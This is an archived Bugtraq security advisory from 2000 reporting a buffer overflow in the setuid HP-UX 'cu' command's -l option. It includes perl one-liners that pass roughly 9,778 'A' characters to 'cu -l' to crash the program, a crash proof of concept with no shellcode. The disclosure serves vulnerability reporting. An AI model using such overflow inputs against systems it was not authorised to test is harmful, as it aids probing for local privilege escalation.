[17460] in bugtraq

home help back first fref pref prev next nref lref last post

HPUX cu -l option buffer overflow vulnerabilit

daemon@ATHENA.MIT.EDU (zorgon)
Thu Nov 2 12:33:28 2000

Content-Type: text/plain
Content-Disposition: inline
Mime-Version: 1.0
Message-ID:  <200011021343.eA2DhRU20236@tbird.iworld.com>
Date:         Thu, 2 Nov 2000 08:43:27 -0500
Reply-To: zorgon <zorgon@LINUXSTART.COM>
From: zorgon <zorgon@LINUXSTART.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

=======================================================
    HPUX cu -l option buffer overflow vulnerability
=======================================================

Date: 02/11/2000
Tested on HP-UX B.11.00

$ ls -la `which cu`
-r-sr-xr-x   1 bin          40960  9 avr  1998 /bin/cu

Using '-l' with a long option string:
$ cu -l `perl -e 'printf "A" x 9777'`
La connexion a  chou     : Requested device/system name not known

$ cu -l `perl -e 'printf "A" x 9778'`
Memory fault



==================================
zorgon <zorgon@linuxstart.com>
http://www.nightbird.free.fr
----------------------
Do you do Linux? :)
Get your FREE @linuxstart.com email address at: http://www.linuxstart.com

home help back first fref pref prev next nref lref last post